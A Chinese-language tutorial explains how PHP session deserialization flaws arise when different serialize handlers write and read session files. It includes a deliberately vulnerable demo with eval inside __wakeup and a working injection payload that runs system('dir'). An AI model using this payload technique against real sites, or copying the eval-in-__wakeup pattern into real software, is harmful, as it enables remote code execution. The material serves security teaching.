PHP session反序列化漏洞深入探究

 更新时间:2022年11月11日 14:08:36   作者:隐形卟  
这篇文章主要介绍了PHP session反序列化漏洞,我们一般利用反序列漏洞,一般都是借助unserialize()函数,不过随着人们安全的意识的提高这种漏洞利用越来越来难了

PHP session

php session 反序列化漏洞存在的原因:当序列化session和读取反序列化字符时采用的序列化选择器不一样时,处理的方法不一样。

php三种序列化处理器

序列化处理器
php            (php默认中使用的序列化)   存储格式为:键名 + 竖线 + 经过serialize()函数反序列化处理的值

php_binary   存储格式:键名的长度对应的ASCII字符 + 键名 + 经过serialize()函数反序列化处理的值

php_serialize 在php版本>5.5.4中可以选择使用   存储格式:经过serialize()函数反序列处理的数组

通过php.ini 可以设置保存路径配置 php session 参数是 session.save_path=“保存路径”

php 中配置session序列化处理器通过ini_set()方法进行选择 :ini_set(‘session.serialize_handler’, ‘处理器’);

生成session php_serialize序列化处理器

demo2.php
<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();//创建一个session 会话(当客户端第一次访问时会生成一个随机的session文件在指定保存目录中)
$_SESSION['session'] = $_GET['k'];
var_dump($_SESSION);

访问该页面

查看session 文件保存路径,生成了一个sess_一串随机字符的文件,打开文件查看,从get提交的值以序列化的格式存储到该文件。

在读取session时使用不一样的序列化处理器,使用php_serialize 序列化处理会把 符号 “|“作为一个正常的字符处理。而php序列化处理器会把”|” 当成分割符处理。

ctf.php
<?php
ini_set('session.serialize_handler', 'php');
session_start();
class test{
    public $name;
    function __wakeup(){
        eval($this->name);
    }
}

构造成反序列化payload为:k=|O:4:“test”:1:{s:4:“name”;s:17:“system(‘dir’);”;}

访问demo2.php

查看sess文件内容:| 分割符被传递了进去

再访问ctf.php,触发了__wakeup函数从而执行了eval代码执行命令,由于使用不同的序列化处理器来处理session文件,序列化对特殊符号的处理方法不一样,从而导致产生了漏洞

到此这篇关于PHP session反序列化漏洞深入探究的文章就介绍到这了,更多相关PHP session反序列化内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

相关文章

  • php一些公用函数的集合

    php一些公用函数的集合

    php常用公用函数
    2008-03-03
  • php json转换成数组形式代码分享

    php json转换成数组形式代码分享

    这篇文章主要介绍了php json转换成数组形式代码分享,需要的朋友可以参考下
    2014-11-11
  • PHP自定义错误用法示例

    PHP自定义错误用法示例

    这篇文章主要介绍了PHP自定义错误实现方法,可实现自由控制错误及提示内容的功能,涉及php使用自定义函数处理错误的相关操作技巧,需要的朋友可以参考下
    2016-09-09
  • PHP单元测试PHPUnit简单用法示例

    PHP单元测试PHPUnit简单用法示例

    这篇文章主要介绍了PHP单元测试PHPUnit简单用法,结合实例形式分析了PHPUnit的安装、单元测试简单操作技巧,需要的朋友可以参考下
    2018-07-07
  • php操作MongoDB类实例

    php操作MongoDB类实例

    这篇文章主要介绍了php操作MongoDB类的方法,实例分析了仿照CI实现的MongoDB类及其操作技巧,需要的朋友可以参考下
    2015-06-06
  • php+mysql实现数据库随机重排实例

    php+mysql实现数据库随机重排实例

    这篇文章主要介绍了php+mysql实现数据库随机重排,讲述了MySQL的查找及更新等处理技巧,有一定的参考借鉴价值,需要的朋友可以参考下
    2014-10-10
  • php读取csv文件并输出的方法

    php读取csv文件并输出的方法

    这篇文章主要介绍了php读取csv文件并输出的方法,涉及php中fgetcsv函数的使用技巧,具有一定参考借鉴价值,需要的朋友可以参考下
    2015-03-03
  • php实现数字补零的方法总结

    php实现数字补零的方法总结

    这篇文章给大家总结了关于php实现数字补零的方法以及相关代码分享,有兴趣的朋友们学习下。
    2018-09-09
  • PHP操作XML中XPath的应用示例

    PHP操作XML中XPath的应用示例

    这篇文章主要介绍了PHP操作XML中XPath的应用,结合实例形式分析了php使用XPath进行xml节点查询的相关操作技巧,需要的朋友可以参考下
    2019-07-07
  • Php Cookie的一个使用注意点

    Php Cookie的一个使用注意点

    这里需要提醒大家注意的一点是,在 php 中, 如果你在当前页面设置了COOKIE,在 当前页面刷新 或 转向到其他页面之前, cookie 的设置结果不会生效(cookie未过期的情况下)。
    2008-11-11

最新评论